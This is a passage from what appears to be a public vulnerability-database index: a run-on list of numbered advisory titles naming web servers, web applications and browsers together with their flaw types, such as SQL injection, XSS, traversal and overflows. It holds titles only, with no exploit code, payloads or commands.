Intuity Audix LX /cswebadm/diag/cgi-bin/nslookup.pl Multiple Parameter Arbitrary Command Execution [60523] Avaya Intuity Audix LX /cswebadm/diag/cgi-bin/sendrec.pl Multiple Parameter Arbitrary Command Execution [60471] Web Services Module for Drupal API Access Control Unspecified Weakness [60444] QT WebKit preflight Request Cross-Origin Resource Sharing Bypass [60443] QT WebKit FTP Directory Listing Handling Arbitrary Code Execution [60430] IBM WebSphere Application Server (WAS) XML Password Export Encryption Weakness [60429] Openwebmail Crafted SCRIPT_FILENAME Environment Variable Local Privilege Escalation [60411] BEA WebLogic Embedded LDAP Server Anonymous Bind Connection Saturation Remote DoS [60392] H-Sphere WebShell flist fname Argument Handling Remote Overflow [60391] H-Sphere WebShell diskusage Path Handling Remote Overflow [60390] H-Sphere WebShell CGI::readFile URL Content Type Handling Remote Overflow [60386] BEA WebLogic Server Session Replication Cross-user Session Information Disclosure [60385] BEA WebLogic Servlet Relative Forwarding Unspecified Remote DoS [60384] PHP-Nuke Web_Links Module aid Cookie SQL Injection [60350] IBM Net.Data Web Form Predefined Variable Remote Information Disclosure [60323] Linux IPTables Netlink Interface Spoofed Message Local DoS [60315] Alteon OS Browser-Based Interface (BBI) Settings Manipulation CSRF [60314] Alteon OS Browser-Based Interface (BBI) SSH Log Files XSS [60293] NETGEAR RP114 Multiple Interface SYN Flood Remote Routing DoS [60263] Origo ASR-8100 ADSL Router Unpassworded Administrative Interface [60243] 2Wire Gateway Multiple Products Management Interface xslt page Parameter Remote DoS [60228] Webmin RPC Module remote_foreign_ Request Remote File Manipulation [60197] IBM WebSphere Application Server (WAS) Administrative Console Security Component Unspecified CSRF [60183] Deerfield WebSite Pro Direct Request Arbitrary Source Disclosure [60180] McAfee VirusScan WebScanX.exe Module DLL Search Path Subversion Local Privilege Escalation [60156] Abyss Web Server HTTP Location Header CRLF HTTP Response Splitting [60152] INweb Mail Server HELO Command Remote Overflow DoS [60149] BEA WebLogic Login Error Message Username Enumeration [60128] VisNetic WebSite httpd32.exe HTTP OPTIONS Request Remote Overflow DoS [60120] Webresolve Hostname Handling Remote Overflow [60118] Webmin Printer Administration Module Printer Name Shell Metacharacter Arbitrary Command Execution [60100] Software602 Web Server /admin/ Directory Direct Request Privilege Escalation [60099] BEA WebLogic Server Servlet Mappings Undocumented Extension Policy Enforcement Bypass [60097] BEA WebLogic Server Cross-user HTTP Request Disclosure [60096] BEA WebLogic Server Enterprise JavaBeans (EJB) Cross-server Undeploy Weakness [60019] IBM Lotus Domino Web Server HTTP Error Message Account Enumeration [60017] AwingSoft Web3D Player WindsPlayerIE.View.1 ActiveX (WindsPly.ocx) SceneURL() Method Overflow [60015] Sun Java Web Start Unspecified Restricted Resource Access [60010] HP Praesidium Webproxy Crafted HTTP Request Forwarding Weakness [59967] Google Chrome WebKit OPTIONS Request Cross-Origin Resource Sharing Security Bypass [59961] IBM WebSphere Application Server (WAS) Administrative Console Unspecified XSS [59943] Apple Safari WebKit FTP Directory Listing Handling Arbitrary Code Execution [59941] Apple Safari WebKit HTML 5 Audio / Video Media Element Loading Weakness [59940] Apple Safari WebKit Cross-Origin Resource Sharing Bypass [59934] Simple Web Server (SWS) recv Function Remote Code Execution [59923] Sun Java SE Java Web Start Implementation Signed JAR File JNLP Application / Applet Interaction Unspecified Issue [59904] Linksys BEFW11S4 Embedded Web Server HTTP Header Handling Remote Overflow DoS [59903] D-Link Multiple Router Embedded Web Server HTTP Header Handling Remote Overflow DoS [59873] XEROX Fiery Webtools summary.php select Parameter SQL Injection [59865] Microsoft Windows Web Services on Devices API (WSDAPI) Message Header Handling Memory Corruption [59847] OmniWeb Cross-domain Browser Window Injection Content Spoofing [59827] Xitami Web Server DOS Filename Request Access Bypass [59816] Business Objects WebIntelligence Session Token Prediction Weakness [59815] GameCheats Advanced Web Server advserver.exe Malformed HTTP Requests Remote DoS [59789] Zeroo Web Server HttpGetRequest Function HTTP Request Remote Overflow [59786] GoAhead WebServer HTTP GET Request Subdirectory Handling Remote Overflow [59783] Webmin Default SSL Key Weakness [59777] Iomega NAS A300U Administration Web Page Cleartext Password Transmission Remote Disclosure [59775] MyWebServer Long HTTP Request Remote DoS [59772] Serv-U FTP Server Web Client Session Cookie Handling Remote Overflow [59748] IBM Lotus Notes Intellisync in BlackBerry Desktop Manager lnresobject.dll ActiveX Crafted Web Page Overflow [59744] Google Chrome src/webkit/glue/webframeloaderclient_impl.cc WebDataSourceImpl::endOfRedirectChain() Function DoS [59717] Sun Java JDK / JRE Deployment Toolkit Web Page Handling Unspecified Arbitrary Code Execution [59716] Sun Java JDK / JRE Web Start Crafted Installer Extension JNLP Handling Trusted Code Execution [59685] Sun Virtual Desktop Infrastructure (VDI) VirtualBox Web Service Unspecified Remote Authentication Bypass [59684] HP Power Manager Web Server URL Parameter Handling Remote Overflow [59661] RoundCube Webmail User Information Modification CSRF [59599] WebCollection Plus s.dll d Parameter Traversal Arbitrary File Access [59588] Cherokee Web Server URL Slash Backslash Traversal Arbitrary File Access [59587] H-Sphere WebShell Multiple Parameter Shell Metacharacter Remote Command Execution [59575] IceWarp WebMail viewaction.html Arbitrary Directory Creation [59540] RadioBird WebServer 4 Everyone Long Host Header HTTP GET Request Remote DoS [59537] Ensim WEBppliance Alias Creation Arbitrary User E-mail Access [59536] webERP logicworks.ini Direct Request Database Credentials Disclosure [59528] Simple Web Server (SWS) 404 Error Message File Descriptor Closure Weakness Remote DoS [59521] WebCalendar .inc File Direct Request Arbitrary File Access [59512] WEBsweeper Multiple Method Blacklist Restriction Bypass [59498] oMail-webmail omail.pl checklogin Function Password Field Arbitrary Command Execution [59497] Sun Java System Web Server Unspecified Overflow [59470] Xitami Web Server Connection Saturation Keep-Alive Handling Remote DoS [59467] ModLogAn processor_web Plugin Traversal Multiple Method Local Arbitrary File Overwrite [59438] Webshots Desktop Screen Saver Password Authentication Bypass [59413] 4D Web Server URI Traversal Arbitrary File Access [59411] PhpWebGallery isadmin.php photo_login Cookie Manipulation Admin Authentication Bypass [59395] Mozilla Firefox Recursive JavaScript Web-workers Memory Corruption [59366] Web_Links Module for PHP-Nuke modules.php cid Parameter Error Message Path Disclosure [59359] Opera Web Font Handling Address Bar Spoofing [59351] BEA WebLogic PageCompileServlet jsp / jhtml Arbitrary Command Execution [59350] Samba Web Administration Tool (SWAT) Malformed HTTP Request Saturation Remote DoS [59343] WebReflex URI Traversal Arbitrary File Access [59342] pWins Webserver URI Traversal Arbitrary File Access [59273] WebChat Module for XOOPS index.php roomid Parameter SQL Injection [59255] WebcamXP Message Field XSS [59245] BPM Studio Pro Web Server MS-DOS Device Request Remote DoS [59243] SonicWALL Pro Internal Interface POST Request Remote DoS [59242] Webwasher CSM Appliance Suite Token Case Mismatch Script Detection Bypass [59226] SAP Web Application Server (enserver.exe) UDP Packet Handling Unspecified Remote DoS [59224] phpWebSite News Message IMG Tag XSS [59209] Citrix XenCenterWeb XenServer Resource Kit config/writeconfig.php pool1 Parameter PHP Code Injection [59208] Citrix XenCenterWeb XenServer Resource Kit hardstopvm.php stop_vmname Parameter CSRF [59207] Citrix XenCenterWeb XenServer Resource Kit config/changepw.php username Parameter CSRF [59206] Citrix XenCenterWeb XenServer Resource Kit login.php username Parameter SQL Injection [59205] Citrix XenCenterWeb XenServer Resource Kit forcesd.php Multiple Parameter XSS [59204] Citrix XenCenterWeb XenServer Resource Kit forcerestart.php Multiple Parameter XSS [59203] Citrix XenCenterWeb XenServer Resource Kit console.php Multiple Parameter XSS [59202] Citrix XenCenterWeb XenServer Resource Kit config/edituser.php username Parameter XSS [59189] acWEB Web Server MS-DOS Device Request Remote DoS [59188] acWEB Web Server URI XSS [59174] VisNetic WebSite 404 Error Page HTTP_REFERER Header XSS [59172] KeyFocus (KF) Web Server URI Consecutive Dot Traversal Arbitrary File Access [59170] Zeroo Web Server URI Traversal Arbitrary File Access [59144] TwonkyMedia Server Management Interface Credentials Manipulation CSRF [59136] Oracle BEA WebLogic Server WLS Console Unspecified Remote Issue (2009-3399) [59135] Oracle BEA WebLogic Server WLS Console Admin Console XSS [59134] Oracle BEA WebLogic Portal Unspecified Remote Issue [59089] IBM Rational RequisitePro ReqWeb Help Feature ReqWebHelp/basic/searchView.jsp Multiple Parameter XSS [59088] IBM Rational RequisitePro ReqWeb Help Feature ReqWebHelp/advanced/workingSet.jsp operation Parameter XSS [59084] WWWeBBB Forum page.cgi URI Traversal Arbitrary File Access [59080] WebDrive Security Descriptor binPath Configuration Manipulation Local Privilege Escalation [59076] Websense Email Security / Personal Email Manager Web Administrator Email Subject XSS [59075] Websense Email Security / Personal Email Manager web/msgList/viewmsg/viewHeaders.asp Multiple Parameter XSS [59074] Websense Email Security / Personal Email Manager web/msgList/viewmsg/actions/msgForwardToRiskFilter.asp Multiple Parameter XSS [59073] Websense Email Security / Personal Email Manager web/msgList/viewmsg/actions/msgAnalyse.asp Multiple Parameter XSS [59072] Websense Email Security / Personal Email Manager Web Administrator STEMWADM.EXE GET Request Remote DoS [59040] Direct Web Remoting (DWR) Script Inclusion Error XSS [59039] Direct Web Remoting (DWR) dwr.util.addOptions Formatting Function XSS [59034] ActivWebserver URI XSS [58949] NaviCOPA Web Server Encoded Space Request Script Source Disclosure [58946] Webform Module for Drupal Cached Page Handling Session Variable Disclosure [58945] Webform Module for Drupal New Webform Field Label XSS [58932] BEA WebLogic Crafted Java Client Code DoS [58904] Dr.Web Anti-virus File Name Handling Overflow [58835] NEXTWEB (i)Site Unspecified Crafted Request Handling Remote DoS [58834] NEXTWEB (i)Site databases/Users.mdb Direct Request Credentials Disclosure [58833] NEXTWEB (i)Site login.asp Multiple Parameter SQL Injection [58779] Apple Mac OS X WebKit WebCore TD Element ROWSPAN Attribute Handling DoS [58778] web-app.org WebAPP Crafted File Upload Weakness [58712] AfterLogic WebMail Pro history-storage.aspx Multiple Parameter XSS [58648] Palm Pre WebOS Multiple Unspecified Issues [58641] Sun AnswerBook2 Web Server dwhttpd /tmp/ecm/utf8.so Local Privilege Escalation [58640] IBM Lotus Domino Web Server DominoNoBanner Function Embedded HTML Information Disclosure [58639] IBM Lotus Domino Web Server statrep.nsf Unauthorized Arbitrary Document Manipulation [58638] IBM Lotus Domino Web Server webadmin.ntf Buffer Truncation Function ACL Bypass [58637] IBM Lotus Domino Web Server Alternate View Document Request ACL Bypass [58636] IBM Lotus Domino Web Server /$Alarms/ Document Enumeration [58614] McAfee Email and Web Security Appliance TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [58603] FreeWebshop index.php action Parameter Traversal Error Message Path Disclosure [58540] Hart InterCivic JBC / JVO Multiple Physical Interfaces Unauthenticated Vote / Log Manipulation [58539] Hart InterCivic eScan Ethernet Interface Unauthenticated Privilege Escalation [58521] WebcamNow Registry Local Cleartext Credential Disclosure [58421] Cisco ACE XML Gateway / Web Application Firewall Internal IP Address Disclosure [58419] IBM Tivoli Composite Application Manager for WebSphere Visualization Engine Unspecified XSS [58417] BIGACE Web CMS Admin Account Creation CSRF [58408] MaxWebPortal forum.asp Multiple Parameter SQL Injection [58386] NaviCOPA Web Server ::$DATA Extension Request Source Code Disclosure [58382] iCRM Basic Component for Joomla! Admin Interface Authentication Bypass [58380] SAP GUI EAI WebViewer3D ActiveX (WebViewer3D.dll) Multiple Method Arbitrary File Overwrite [58379] SAP GUI EAI WebViewer2D ActiveX (WebViewer2D.dll) SaveToSessionFile() Method Arbitrary File Overwrite [58366] Apple Safari WebKit WebKit.dll Crafted String Eval DoS [58365] IBM WebSphere Application Server (WAS) Unspecified Remote DoS (134567) [58364] IBM WebSphere Application Server (WAS) FFDC Log File Local Information Disclosure [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write [58324] IBM WebSphere Application Server (WAS) Eclipse Help Unspecified XSS [58254] IBM WebSphere Business Events Test Servlet wberuntimeear Application Unspecified Arbitrary Code Execution [58240] Uebimiau Webmail system_admin/admin.ucf Direct Request User Database Disclosure [58197] RADactive I-Load Webcontrol File Upload Arbitrary Command Execution [58196] RADactive I-Load WebCoreModule.ashx Traversal Arbitrary File Access [58195] RADactive I-Load WebcodeModule.ashx Multiple Parameter XSS [58194] RADactive I-Load WebCoreModule.ashx File Upload Absolute Path Disclosure [58167] Novell GroupWise WebAccess User.Theme.index Parameter XSS [58158] HotWeb Rentals details.asp PropId Parameter SQL Injection [58131] HP StorageWorks Products Remote Management Interface (RMI) RMU_LEVEL Cookie Privilege Escalation [58106] WebAuth HTTP POST / GET Conversion Password Disclosure [58088] Bugzilla Bug.create WebService Function Unspecified SQL Injection [58087] Bugzilla Bug.search WebService Function Unspecified SQL Injection [58032] Multi Website Default URI search Parameter XSS [58031] simplePHPWeb admin/files.php Unspecified Admin Authentication Bypass [58014] SAP NetWeaver ERP Modules Web Service .Net Connector Unspecified Issue [57912] Java on Apple Mac OS X Java Web Start Command Launcher Unspecified Overflow [57910] LiteSpeed Web Server Unspecified Post-authentication Issue [57909] LiteSpeed Web Server lshttpd Unspecified Infinite Loop DoS [57902] AzeoTech DAQFactory Web Service Unspecified Overflow [57896] Adobe RoboHelp Management Web Server Crafted POST Request File Upload Arbitrary Code Execution [57891] Apple iPhone / iPod Touch WebKit Referer Header Information Disclosure [57884] IBM WebSphere Application Server (WAS) Servlet Engine/Web Container Component HEAD Request Multiple Method Access Restriction Bypass [57876] McAfee Email and Web Security Appliance Unspecified Arbitrary File Access [57841] IBM WebSphere MQ Malformed Data Handling Remote DoS [57840] IBM WebSphere MQ Asynchronous Consume / readahead Functionality Unspecified Memory Overwrite [57839] IBM WebSphere MQ rriDecompress Unspecified Remote DoS [57838] Ipswitch WhatsUp Gold NMWebService.exe Unspecified Remote DoS [57807] IBM Lotus Domino Web Access (DWA) iNotes Unspecified XSS [57751] QtWeb Refresh / Location Header Multiple Method XSS [57677] FTPGate Web Proxy Traversal Arbitrary File Access [57668] Etype Eserv Web Server /? Request Forced Directory Listing [57662] WeBid eledicss.php file Parameter Arbitrary CSS File Modification [57631] ShareMailPro POP3 Interface Error Message Account Enumeration [57619] IBM Lotus Domino webadmin.nsf Directory Creation Command Arbitrary Directory Manipulation [57580] WeBid item.php id Parameter SQL Injection [57579] WeBid logs/cron.log Direct Request Information Disclosure [57578] WeBid Admin Panel username Parameter SQL Injection Authentication Bypass [57576] WebLibs weblibs.pl TextFile Parameter Shell Metacharacter Arbitrary Command Execution [57574] BIGACE Web CMS public/index.php id Parameter XSS [57569] XEROX WorkCentre Web Server Unspecified Unauthorized Access [57532] BRS WebWeaver HTTP GET Request Remote Overflow [57530] TelCondex tc.SimpleWebServer Multiple HTTP Header Handling Remote Overflow [57529] TelCondex tc.SimpleWebServer GET Request Remote Overflow [57523] Inquira Multiple Unspecified Web-based Issues [57520] kobo krb5.py Admin Interface Arbitrary User Authentication [57473] IBM WebSphere Commerce Suite Net.Commerce / Net.Data Components Remote Configuration File Disclosure [57397] Buildbot status/web/waterfall.py Unspecified Parameter XSS [57313] BuildBot Web Status Multiple Unspecified XSS [57214] eZoneScripts Dating Website Unrestricted File Upload Unspecified Arbitrary Code Execution [57211] Xitami Web Server Administrative Port Remote Overflow DoS [57150] RoundCube Webmail Vcard Export Unspecified Issue [57149] RoundCube Webmail Multiple Unspecified Issues [57148] RoundCube Webmail Unspecified Cross-site AJAX Request Disclosure [57147] RoundCube Webmail Submitted Host Value Unspecified Issue [57146] RoundCube Webmail Contact Deletion Unspecified Issue [57144] RoundCube Webmail Unspecified XSS (1484109) [57141] RoundCube Webmail Multiple Unspecified SQL Injection [57140] RoundCube Webmail Multiple Unspecified XSS [57138] RoundCube Webmail Attachment Upload Handling Unspecified Issue [57137] RoundCube Webmail Address Book / Identities Unspecified XSS [57046] IBM WebSphere Application Server (WAS) Service Component Architecture (SCA) Feature Pack authentication.transport Access Restriction Bypass [57045] IBM WebSphere Application Server (WAS) Security Component Enterprise JavaBeans (EJB) Handling CSIv2 Identity Assertion Restriction Bypass [57044] IBM WebSphere Application Server (WAS) Web Services Functionality ibm-webservicesclient-bind.xmi Password Weakness Local DoS [57043] IBM Websphere Commerce Multiple Unspecified Issues [57041] IBM WebSphere Application Server (WAS) Servlet Engine/Web Container Component invokefilterscompatibility Property Secure URL Request Authentication Bypass [57040] IBM WebSphere Application Server (WAS) Migration Component Migration Trace File Information Disclosure [57038] IBM WebSphere Application Server (WAS) System Management/Repository Component wsadmin JMX MBeans Restriction Bypass [57037] IBM WebSphere Application Server (WAS) on z/OS System Management/Repository Component File Permission Weakness Remote Information Disclosure [57036] IBM WebSphere Application Server (WAS) ibm-portlet-ext.xmi portletServingEnabled Parameter Access Restriction Bypass [57035] IBM WebSphere Partner Gateway (WPG) Unspecified SQL Injection [57034] IBM WebSphere Commerce Trace Unspecified Local Information Disclosure [56995] Sun AnswerBook2 Web Server dwhttpd GET Request Remote Format String [56988] Apple Safari WebKit Crafted Floating-point Numbers Remote Overflow [56987] Apple Safari WebKit Unspecified Homoglyph URL Domain Name Spoofing [56986] Apple Safari WebKit ENVED Ekenebt pluginspage Attribute Arbitrary file: URL Information Disclosure [56983] TurnkeyForms Web Hosting Directory Login Functionality password Field SQL Injection [56978] WebHosting Control Panel login.asp Multiple Parameter SQL Injection Authentication Bypass [56975] FreeNAS WebGUI Unspecified CSRF [56972] OpenJDK IcedTea Java Web Start Framework JAR File Trust Weakness Privilege Escalation [56962] Sun Java SE Web Start Implementation JNLP File Handling DoS [56939] Hart InterCivic Tally Administrator Interface adjust votes Feature Vote Count Manipulation [56925] Hart InterCivic JBC Serial Interface (Modem/VRI) Early Voting Mode Unauthenticated Access Code Request Generation [56923] Hart InterCivic eSlate Serial Interface Unauthenticated Command Execution [56922] Hart InterCivic JBC ISR Parallel Port Interface Unauthenticated Command Execution [56916] Microsoft Office Web Components HTMLURL Parameter ActiveX Spreadsheet Object Handling Overflow [56915] Microsoft Office Web Components OWC10.Spreadsheet ActiveX BorderAround() Method Heap Corruption Arbitrary Code Execution [56914] Microsoft Office Web Components OWC10 ActiveX Loading/Unloading Memory Allocation Arbitrary Code Execution [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation [56809] Webform Module for Drupal Unspecified XSS [56787] Sun Java JDK / JRE WebStart (javaws.exe) JPEG Decompression Overflow [56755] Django WSGI-based Web Server Development Service Crafted Request Arbitrary File Access [56748] Multi Website index.php Browse Parameter SQL Injection [56733] TT Web Site Manager tt/index.php tt_name Parameter SQL Injection Authentication Bypass [56635] Miniweb surveypro/index.php campaign_id Parameter SQL Injection [56634] Miniweb publisher/index.php Multiple Parameter SQL Injection [56633] Miniweb classifiedads/index.php URI XSS [56632] Miniweb blogwriter/index.php URI XSS [56631] Miniweb mediaalbum/index.php URI XSS [56630] Miniweb jobboard/index.php URI XSS [56629] Miniweb surveypro/index.php URI XSS [56628] Miniweb publisher/index.php URI XSS [56627] Miniweb sitebuilder/index.php URI XSS [56626] Miniweb onlinestore/index.php URI XSS [56625] Miniweb myamazon/index.php URI XSS [56624] Miniweb forum/index.php URI XSS [56623] Miniweb faqmanager/index.php URI XSS [56622] Miniweb eventscalendar/index.php URI XSS [56621] Miniweb directory/index.php URI XSS [56620] Miniweb index.php Multiple Parameter XSS [56619] WebStatCaffe visitorduration.php nodayshow Parameter SQL Injection [56618] WebStatCaffe stat/host.php host Parameter XSS [56600] Webboard view.php topic Parameter Traversal Arbitrary File Access [56534] Check Point Web Intelligence Unicode Character Encoding Handling HTTP Traffic Detection Bypass [56511] WWWBoard Default WebAdmin Account [56474] Microsoft IIS WebDAV Extension URL Decode Crafted HTTP Request Authentication Bypass [56458] IBM Lotus Instant Messaging and Web Conferencing Sametime Server Login Error Message User Account Enumeration [56440] GoAhead WebServer Crafted GET Request Restricted Directory Protection Bypass [56439] GoAhead WebServer GET Request Encoded Traversal Arbitrary File Access [56435] WebKit WebCore xml/XMLHttpRequest.cpp Set-Cookie HTTP Response Header Restriction Weakness [56434] Web On Windows (WOW) ActiveX 2 Multiple Method Arbitrary Command Execution [56429] GoAhead WebServer websSafeUrl Function Malformed URL NULL Dereference Remote DoS [56428] GoAhead WebServer sockGen.c socketInputBuffered Function Unspecified Remote Issue [56427] GoAhead WebServer webs.c Crafted POST Request NULL Pointer Dereference DoS [56426] GoAhead WebServer Socket Disconnect Remote DoS [56425] GoAhead WebServer Extra Slash Request Authentication Bypass [56424] GoAhead WebServer on Windows MS-DOS Device Name Request DoS [56423] Web File Explorer body.asp file Parameter Arbitrary Remote Code Execution [56418] Active Web Mail emails.aspx TabOpenQuickTab1 Parameter SQL Injection [56417] Active Web Mail addressbook.aspx TabOpenQuickTab1 Parameter SQL Injection [56416] Active Web Mail popaccounts.aspx TabOpenQuickTab1 Parameter SQL Injection [56396] N/X Web Content Management mass_operations.inc.php c_path Parameter Remote File Inclusion [56395] N/X Web Content Management datasets.php c_path Parameter Remote File Inclusion [56394] N/X Web Content Management menu.inc.php c_path Parameter Remote File Inclusion [56369] HP Multiple Products Embedded Web Server (EWS) Default Blank Management Password [56358] JBoss Enterprise Application Platform Web Services Crafted Request Arbitrary XML File Disclosure [56327] Sun Java System Access Manager Policy Agent Web Proxy Server Deployment Container DoS [56299] Horde Multiple Webmail Local PGP Key Caching Weakness [56292] Palm Pre WebOS LunaSysMgr Service URL Handling Memory Corruption [56237] IBM Tivoli Identity Manager Console / Self Service Interface Session Fixation [56175] Hutscripts PHP Website Script showcategory.php cid Parameter SQL Injection [56172] Hutscripts PHP Website Script lostpassword.php msg Parameter XSS [56171] Hutscripts PHP Website Script feedback.php msg Parameter XSS [56170] Hutscripts PHP Website Script index.php msg Parameter XSS [56162] IBM WebSphere Application Server (WAS) Web Services Stax XMLStreamWriter XML Encoding Weakness Access Restriction Bypass [56161] IBM WebSphere Application Server (WAS) JAX-WS Application Crafted Request Access Restriction Bypass [56159] IBM WebSphere Application Server (WAS) Scheduler Account Report Sample (/scheduler/accountreport) Multiple Parameter XSS [56158] IBM WebSphere Application Server (WAS) /ApplicationProfileSample/servlet/AccountManagementServlet Multiple Parameter XSS [56157] IBM WebSphere Application Server (WAS) DynamicQuery/EjbMediatorWeb/ query Parameter XSS [56156] IBM WebSphere Application Server (WAS) /DynamicQuery/EmployeeFinderWeb/EmployeeFinder.jsp Multiple Parameter XSS [56155] IBM WebSphere Application Server (WAS) JAX-WS Web Services Ping and Echo Sample (/scriptwssamplesei/demo) Multiple Parameter XSS [56154] IBM WebSphere Application Server (WAS) JAX-WS Web Services MTOM Sample (/wssamplemtom/demo) uridef Parameter XSS [56153] IBM WebSphere Application Server (WAS) /PlantsByWebSphere/servlet/ShoppingServlet Multiple Parameter XSS [56152] IBM WebSphere Application Server (WAS) /PlantsByWebSphere/servlet/AccountServlet userid Parameter XSS [56151] IBM WebSphere Application Server (WAS) PlantsByWebSphere Sample URI XSS [56087] EzWebCalendar Image Upload Arbitrary ASP Code Execution [56082] EZWebSearch results.php language Parameter XSS [56053] Webconverger Kiosk Extension file:// URI Handling Unspecified Issue [55945] SaschArt SasCam Webcam Server XHTTP Module ActiveX Get Method Remote Overflow [55940] EiffelStudio on Windows IPv6 Listening Mode IPv4 Interface Traffic Disclosure [55936] Cisco Unified Contact Center Express (CCX) Customer Response Solutions (CRS) Administration Interface Traversal Arbitrary File Manipulation [55935] PeterConnects Web Server Traversal Arbitrary File Access [55907] Oracle BEA WebLogic Server Web Services Package HMACOutputLength Signature Spoofing Weakness [55906] Oracle BEA WebLogic Server Servlet Container Package Unspecified Unauthenticated Remote Issue [55905] Oracle BEA WebLogic Server WLS Console Package console-help.portal searchQuery Parameter XSS [55851] Hitachi Web Server Reverse Proxy Unspecified Memory Exhaustion DoS [55850] Hitachi Web Server SSL Client Certificate Handling Security Bypass [55806] Microsoft Office Web Components OWC10.Spreadsheet ActiveX msDataSourceObject() Method Memory Corruption [55800] ENOVIA SmarTeam V5 Web Editor Unauthorized Profile Card Access [55798] WebGUI Unspecified CSRF [55750] Related Sites Plugin for Wordpress BTE_RW_webajax.php guid Parameter SQL Injection [55739] Apple Safari WebKit Numeric Character References Handling Memory Corruption [55738] Apple Safari WebKit Parent / Top Object Handling Unspecified XSS [55724] Dillo Web Browser HTTP Content-Type Unspecified Input Weakness [55723] Dillo Web Browser Http_query Unspecified Overflow [55721] Amaya Web Browser html2toth.c Multiple Function Overflow [55720] Amaya Web Browser Xml2thot.c Multiple Function Overflow [55714] WordPress Forgotten Mail Interface New Password Request User Enumeration [55699] SAP MaxDB webdbm Multiple Parameter XSS [55656] Dillo Web Browser Png_datainfo_callback() Function PNG File Handling Overflow [55655] Sun Java System Web Server ::$DATA Extension Request JSP Resource Disclosure [55654] MiniWeb HTTP Server GET Request Remote Overflow DoS [55653] MiniWeb HTTP Server Crafted Request Forced File Download / Source Disclosure [55651] Microsoft DirectShow Video Streaming ActiveX (msvidctl.dll) IMPEG2TuneRequest DirectX Object Interface Overflow [55641] COMTREND CT-536/HG-536 Admin Interface NAT Table Description Field Overflow DoS [55636] DD-WRT Router Admin Interface apply.cgi Multiple CSRF [55627] WeBid /admin/ST_platforms.php include_path Parameter Remote File Inclusion [55626] WeBid /admin/ST_countries.php include_path Parameter Remote File Inclusion [55625] WeBid /admin/ST_browsers.php include_path Parameter Remote File Inclusion [55624] WeBid cron.php include_path Parameter Remote File Inclusion [55602] AdminLog Administration Interface Multiple Variable Manipulation Authentication Bypass [55601] radware AppWall Web Application Firewall (WAF) Management/ Directory Multiple .inc File Direct Request Source Code Disclosure [55588] Pidgin OSCAR Protocol Implementation Crafted ICQWebMessage Remote DoS [55587] Apple Safari WebKit servePendingRequests() Function Use-After-Free DoS [55583] V-webmail includes/email.list.search.php CONFIG[includes] Parameter Remote File Inclusion [55582] V-webmail includes/prepend.php CONFIG[includes] Parameter Remote File Inclusion [55581] V-webmail includes/cachedConfig.php CONFIG[pear_dir] Parameter Remote File Inclusion [55580] Cisco ASA WebVPN Third Party Login Screen Display Weakness [55579] V-webmail includes/prepend.php CONFIG[pear_dir] Parameter Remote File Inclusion [55578] V-webmail includes/pear/File.php CONFIG[pear_dir] Parameter Remote File Inclusion [55577] Cisco ASA WebVPN URL/HTML Rewriting Hex-encoded /+CSCO+ URI XSS [55576] V-webmail includes/pear/Log.php CONFIG[pear_dir] Parameter Remote File Inclusion [55575] Cisco ASA WebVPN /+CSCOL+/cte.js csco_wrap_js Function DOM Wrapper Bypass XSS [55574] V-webmail includes/pear/System.php CONFIG[pear_dir] Parameter Remote File Inclusion [55573] V-webmail includes/pear/Console/Getopt.php CONFIG[pear_dir] Parameter Remote File Inclusion [55572] V-webmail includes/pear/Mail/mimeDecode.php CONFIG[pear_dir] Parameter Remote File Inclusion [55571] V-webmail includes/pear/XML/Tree.php CONFIG[pear_dir] Parameter Remote File Inclusion [55570] V-webmail includes/pear/XML/Parser.php CONFIG[pear_dir] Parameter Remote File Inclusion [55569] V-webmail includes/pear/Net/Socket.php CONFIG[pear_dir] Parameter Remote File Inclusion [55568] V-webmail includes/pear/Mail/RFC822.php CONFIG[pear_dir] Parameter Remote File Inclusion [55551] IBM Tivoli Identity Manager ITIM Console Interface XSS [55550] IBM Tivoli Identity Manager Self-Service UI Interface XSS [55518] Sun Java Web Console Unspecified XSS [55510] BIGACE Web CMS index.php cmd Parameter Traversal Local File Inclusion [55506] Hyperguard Web Application Firewall (WAF) HTTP Content-Length Header Request DoS [55486] NETGEAR DG632 cgi-bin/webcm nextpage Parameter Traversal Arbitrary Directory Listing [55418] KDE Konqueror WebKit JavaScript Garbage Collector Allocation Failure NULL Pointer Arbitrary Code Execution [55417] KDE Konqueror WebKit CSS attr Function Uninitialized Pointer Issue Arbitrary Code Execution [55415] KDE Konqueror WebKit SVG Animation Element Use-after-free Arbitrary Code Execution [55414] WebKit DOM Error Event Recursion Handling Memory Corruption [55382] Quagga / Zebra Netlink Interface Spoofed Message Local DoS [55381] GNU C Library (glibc) getifaddrs Function Netlink Interface Spoofed Message Local DoS [55375] Sqwebmail mime.php Content-Type XSS [55373] OpenWebmail mime.php Content-Type XSS [55362] Novell NetWare Enterprise Web Server .bas Filename XSS [55361] Novell NetWare Enterprise Web Server Malformed Perl Filename XSS [55350] IBM Rational ClearQuest CQWeb Server Unspecified Credential Disclosure [55349] IBM Rational ClearQuest CQWeb Server Unspecified XSS [55348] Cisco Video Surveillance 2500 Series IP Camera Embedded Web Server Unspecified Arbitrary File Access [55337] Xeneo Web Server GET Request Remote Overflow DoS [55331] MDG Web Server 4D GET Request Remote Overflow DoS [55324] Savant Web Server Multiple Percent Request Remote DoS [55316] phpDatingClub website.php page Parameter XSS [55304] NETGEAR ProSafe VPN Firewall Web Server Malformed Basic Authorization Header Remote DoS [55292] phpWebThings fdown.php id Parameter SQL Injection [55291] AdaptWeb index.php newlang Parameter Traversal Arbitrary File Access [55290] AdaptWeb a_index.php CodigoDisciplina Parameter SQL Injection [55267] Taxonomy Manager Module for Drupal Admin Page Interface Multiple Field XSS [55264] Interspire Website Publisher Arbitrary User Creation CSRF [55243] Green Dam Web Site Filtering SurfGd.dll Injected URL Handling Remote Overflow [55242] Apple iPhone / iPod Touch WebKit HTMLSelectElement Object Handling Memory Consumption DoS [55196] Fretsweb charts.php language Parameter Traversal Arbitrary File Access [55188] WebNMS report/ReportViewAction.do type Parameter XSS [55168] Fretsweb song.php hash Parameter SQL Injection [55167] Fretsweb player.php name Parameter SQL Injection [55166] Fretsweb admin/common.php Multiple Parameter Traversal Local File Inclusion [55114] Webmedia Explorer index.php Multiple Parameter XSS [55111] SWS Web Server Unfinished Line Remote DoS [55106] Free Joke Script webadmin/includes/security.php Admin Account Password Manipulation [55096] Compaq Web-Based Management Agent Encoded Traversal File Request Enumeration [55095] Compaq Web-Based Management Agent Remote Overflow 